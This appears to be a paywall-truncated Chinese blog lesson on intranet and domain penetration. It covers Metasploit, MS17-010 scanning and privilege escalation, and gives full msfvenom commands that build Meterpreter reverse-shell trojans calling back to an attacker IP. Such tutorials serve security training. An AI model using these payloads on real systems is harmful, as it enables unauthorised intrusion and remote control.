第十八章——内网渗透之域渗透

最新推荐文章于 2024-04-14 16:19:51 发布
最新推荐文章于 2024-04-14 16:19:51 发布
阅读量477 收藏
点赞数
分类专栏: 网络安全 科技公开课程 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/L18296069161/article/details/103642949
版权

773617250渗透学习交流群,进群可领取一套完整学习工具,群内定期通知参加直播课程,直播时间可与老师进行互动。感谢大家的支持!

  1. MSF
    在讲域渗透之前,先给大家讲讲MSF
    ●kali代理配置
    http://pawelli.com/archives/527
    ●回顾msf知识
    ●针对内网 批量扫描 ms17-010
    ●针对域成员 08R2 msf渗透 并提权

要点:针对对方是x64的架构 生成一个x64的反弹shell的exe文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.145 LPORT=6666 -f exe -o shell.exe
可以利用这个模块配合提权multi/recon/local_exploit_suggester

关于msfvenom生成木马:

参数:
-p 指定要使用的 msf 的 payload,也可以使用自定义 payload。
-l 列出所有可用的所有可用资源. 模块类型包括: payloads, encoders, nops等。
-n 为 payload 预先指定一个 NOP 滑动长度(一切为了绕过防火墙与免杀)。
-f 指定 payload 输出的文件类型,–help-formats,可查看支持的所有输出格式(默认的输出格式是 raw,直接输出 payload 的字符,含乱码之类)。
-e 指定要使用编码器。
-a 指定 payload 的目标架构,如 windows 系统的 x64,x86。
–platform 有效载荷的平台,如 windows 系统等。
-s 设定有效攻击荷载的最大长度,简单说就是生成的后门的字节数。
-b 指定坏字符,比如空字符截断问题等,导致后门无法运行。
-i 指定编码的次数,如果使用编码器。
-c 指定一个附加的 win32 shellcode 文件指定一个自定义的可执行文件作为模板。
-x 使用一个自定义可执行程序模板,并将 payload 嵌入其中
-k 当模板被执行时,payload 自动分离并注入到新的进程中,一般和-x 选项一并使用。
-o 指定创建好的 payload 的存放位置
-v 指定一个自定义的变量,以确定输出格式

生成shell(木马的命令):
linux :
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.3.226 LPORT=8888 -f elf -o x86_linux.elf

msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.3.226 LPORT=8888 -f elf -o x6_4linux.elf

windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.3.226 LPORT=8888 -f exe -o

最低0.47元/天 解锁文章
L18296069161
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透之域渗透.pdf
08-07
高级域渗透技巧包括但不限于:环境判断、弱点分析、中间人攻击(MITM)、假冒令牌攻击、键盘记录器等。这些技巧需要攻击者具备高水平的技术知识和实际操作经验,以及对目标网络和系统的深入了解。 ### 总结 内网...
【知识整理】渗透思路总结
命运的旋律的博客
01-04 1921
渗透思路总结 文章目录渗透思路总结Hacker语法网站IP查找网站IP验证子域名查找旁站查找C段扫描网站支持的HTTP方法使用NMAP脚本扫描使用OPTIONS方法使用KALI中CURL漏洞扫描端口服务扫描网站指纹扫描网站目录扫描漏洞利用(完善中)SQL注入XXEXSSCSRFSSRFCRLF命令执行漏洞文件上传漏洞解析漏洞文件包含漏洞逻辑漏洞系统提权FINAL渗透报告的撰写 进行信息收集,根据开...
提权辅助工具:Windows--exploit-suggester.py安装及使用
weixin_45650977的博客
01-13 2064
下载地址 https://github.com/AonCyberLabs/Windows-Exploit-Suggester 1、安装xlrd包(注意python2、3版本的pip问题) 使用python2 的pip来安装xlrd包 命令:python2-m pip install xlrd==1.2.0 注意: 安装的xlrd版本必须为1.2.0版本,否则使用时会报错,原因是:最近xlrd更新到了2.0.1版本,只支持.xls文件。所以pandas.read...
windows下提权的辅助工具
西部壮仔的博客
02-01 883
windows-exploit-suggester 介绍 windows-exploit-suggester的功能就如它的名字一样,当我们用它来探测某一个系统时,他会告诉我们该系统有哪些exploit可能可以利用。但是由于该工具先是假设一个系统存在所有的相关漏洞,然后根据补丁信息再去排除,所以就导致误报率会高一点,例如一台机器没有启用iis服务,但是可能该工具会误报存在IIS相关漏洞 使用 该工具...
Windows-Exploit-Suggester
qq_54713392的博客
05-08 746
Windows-Exploit-Suggester 1,下载Windows-Exploit-Suggester 下载地址:https://github.com/GDSSecurity/Windows-Exploit-Suggester 2,此python脚本用2.x(2.7.9) 下载python2.7版本,配置环境变量,右击计算机,选择属性=》高级系统设置=》环境变量=》找到Path=》编辑=》在变量值最后加上;E:\Python27;E:\Python27\Scripts 在cmd下查看python
记录一次linux内网完整渗透测试
NZXHJ的博客
07-18 3544
记录一次完整系统的linux内网渗透测试
内网渗透之——数据压缩、传输
01-09
数据压缩 作用: 将文件打包,方便下载 Linux 直接使用tar命令压缩 windows 利用Rar.exe(winrar.exe里的执行文件) 参数说明: a 添加文件到压缩文件中 -k 锁定压缩文件 -s产生固体存档,这样可以增大压缩比 ...
[ 内网渗透 ] 域管定位工具.zip
02-11
当攻击者试图渗透进内网时,找到域控制器是其进一步控制网络的关键步骤。本篇将详细讲解如何利用特定的工具进行域管定位,以及这些工具在内网渗透过程中的作用。 标题提及的“[内网渗透] 域管定位工具.zip”是一个...
渗透——内网转发之利用ftp实现文件传输
01-09
FTP(File Transfer Protocol,文件传输协议) 是 TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于...
我所了解的内网渗透——内网渗透知识大总结 作者:未知.pdf
04-08
信息收集是内网渗透的第一步。这一步骤的目的是获取尽可能多的关于目标网络的信息,包括但不限于域名控制器(Domain Controller, DC)的位置、开放的服务、用户的凭证等。以下是一些常见的信息收集技术: 1. **确定...
Linux内网渗透基础篇
m0_61506558的博客
11-08 997
(一)本机基本信息。iptables -L 查看防火墙配置 查看防火墙状态:systemctl status firewalld service iptables status暂时关闭防火墙:systemctl stop firewalld service iptables stop永久关闭防火墙:systemctl disable firewalld chkconfig iptables off重启防火墙:systemctl enable firewalld service iptab
内网渗透-域渗透
qq_44806973的博客
11-23 4775
内网渗透(域渗透) 基础指南
linux 有 域的概念吗,域渗透基本概念
weixin_35719380的博客
05-25 3394
登录认证域是windows下的一种统一化管理的方式,明确一点,一个电脑可以用多个账号登录,并且还可以本地用户和域用户两种方式登录,没有域环境和有域环境的认证方式不同windows终端的管理,往往会分为,单独的主机,工作组,域环境,三种环境下认证方式均有不同类比linux的/etc/passwd和/etc/shadow的用来存放用户权限和用户密码的文件,windows同样有类似的文件是c:\syst...
内网渗透-实战|手把手教你如何进行内网渗透
最新发布
lza20001103的博客
04-14 3577
内网渗透-实战|手把手教你如何进行内网渗透
Linux内网渗透
weixin_63124284的博客
02-05 770
主要测试跨网段内网渗透和隧道搭建
渗透利器 | 提权辅助工具箱
03-25 2万+
作为技术宅的我,日常最大的爱好就是逛论坛。某日看到论坛里有一款基于主机的漏洞扫描工具,用来查找主机上公开EXP的CVE。嗯嗯,我想还是叫提权辅助工具可能...
Metasploit拿到shell后 低权限---提权篇
qq_58000413的博客
08-24 1522
下载地址https://github.com/AonCyberLabs/Windows-Exploit-Suggester1、安装xlrd包(注意python2、3版本的pip问题)使用python2 的pip来安装xlrd包命令:python2-m pip install xlrd==1.2.0注意:安装的xlrd版本必须为1.2.0版本,否则使用时会报错,原因是:最近xlrd更新到了2.0.1版本,只支持.xls文件。e.高级 -> 添加 -> 选择主体 -> 输入用户名,检查名称 -> 确定。
渗透实战:内网域渗透
热门推荐
kali_Ma的博客
11-22 3万+
前言 本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。 网络拓扑如下: web服务器 先来波端口扫描: 直接发现了内网的ip,这里需要提前说明一点,由于靶场搭建的问题,weblogic只在10.10.20.12这个ip上才能解析,所以需要调整下ip设置,等做完web
2021-11-6完整linux内网渗透实战笔记(域/非域对于linux其实区别不大+宝塔后台渗透+稻壳DocCMSsql注入+交互式shell用python解决乱码问题)
qq_45290991的博客
11-14 7127
外网打点发现web服务器有: DocCMS的sql需要url双重编码绕过,所以sqlmap要tamper: sqlmap.py -u "http://网站ip/search/?keyword=123" --tamper=chardoubleencode 代码审计之_doccms2016漏洞_whojoe的博客-CSDN博客 代码审计之DocCms漏洞分析-阿里云开发者社区 得到:current user: 'www_ddd4_com@localhost' sqlmap identifie.
内网渗透实战指南:发现与控制域环境风险
内网渗透讲义深入探讨了在信息技术领域中,特别是在Windows网络环境中,内网渗透的重要性和方法。内网,或称局域网(LAN),是一种在特定地理范围内,如办公室或企业内部,通过网络连接多台计算机的封闭型网络。它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值